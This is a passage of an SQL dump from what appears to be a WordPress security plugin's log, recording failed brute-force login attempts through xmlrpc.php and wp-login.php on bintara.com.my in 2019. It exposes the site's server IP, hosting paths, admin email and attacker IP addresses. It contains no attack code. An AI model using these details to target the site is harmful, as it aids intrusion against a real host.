09:37:53',17866520,19189848,'https://bintara.com.my/wp-login.php',1,0,'188.165.240.15'),(23706,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.240.15\";s:11:\"REMOTE_PORT\";s:5:\"37884\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXTL82QiRFwpQHAeM5Pt8wAAAM4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567935476.0584\";s:12:\"REQUEST_TIME\";s:10:\"1567935476\";}}','notice','2019-09-08 09:37:57','2019-09-08 09:37:56',18210752,19509712,'https://bintara.com.my/xmlrpc.php',1,0,'188.165.240.15'),(23707,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"482\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"45.119.84.18\";s:11:\"REMOTE_PORT\";s:5:\"58496\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXTUpIjnkVx6k5bJrKjd9gAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567937700.822\";s:12:\"REQUEST_TIME\";s:10:\"1567937700\";}}','notice','2019-09-08 10:15:06','2019-09-08 10:15:01',18326672,19514560,'https://bintara.com.my/xmlrpc.php',1,0,'45.119.84.18'),(24774,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"216.57.225.2\";s:11:\"REMOTE_PORT\";s:5:\"53076\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFgUo75s89pqgR69SLgOgAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568759891.0801\";s:12:\"REQUEST_TIME\";s:10:\"1568759891\";}}','notice','2019-09-17 22:38:12','2019-09-17 22:38:11',17739656,19230160,'https://bintara.com.my/wp-login.php',1,0,'216.57.225.2'),(24775,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"216.57.226.2\";s:11:\"REMOTE_PORT\";s:5:\"54264\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFgVo75s89pqgR69SLgPAAAAY0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568759894.4166\";s:12:\"REQUEST_TIME\";s:10:\"1568759894\";}}','notice','2019-09-17 22:38:15','2019-09-17 22:38:14',18256544,19555936,'https://bintara.com.my/xmlrpc.php',1,0,'216.57.226.2'),(24776,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"59.152.241.38\";s:11:\"REMOTE_PORT\";s:5:\"47964\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFh5475s89pqgR69SLg1AAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568760295.1355\";s:12:\"REQUEST_TIME\";s:10:\"1568760295\";}}','notice','2019-09-17 22:44:56','2019-09-17 22:44:55',17739672,19229760,'https://bintara.com.my/wp-login.php',1,0,'59.152.241.38'),(24777,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"59.152.241.38\";s:11:\"REMOTE_PORT\";s:5:\"48410\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFh6SqbKGlf1IVly7N9CQAAAVY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568760297.2757\";s:12:\"REQUEST_TIME\";s:10:\"1568760297\";}}','notice','2019-09-17 22:44:58','2019-09-17 22:44:57',18256704,19556336,'https://bintara.com.my/xmlrpc.php',1,0,'59.152.241.38'),(24778,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"38858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFi5UQGijxhVPhG1M0A5QAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568760550.065\";s:12:\"REQUEST_TIME\";s:10:\"1568760550\";}}','notice','2019-09-17 22:49:11','2019-09-17 22:49:10',17740200,19230176,'https://bintara.com.my/wp-login.php',1,0,'128.199.155.15'),(24779,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"39178\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFi6EQGijxhVPhG1M0A6AAAAAw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568760552.8344\";s:12:\"REQUEST_TIME\";s:10:\"1568760552\";}}','notice','2019-09-17 22:49:14','2019-09-17 22:49:13',18255584,19554272,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.155.15'),(24780,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"153.126.195.38\";s:11:\"REMOTE_PORT\";s:5:\"60118\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFjZG4SfF9g@8lNlxwjkgAAAFE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568760676.7099\";s:12:\"REQUEST_TIME\";s:10:\"1568760676\";}}','notice','2019-09-17 22:51:18','2019-09-17 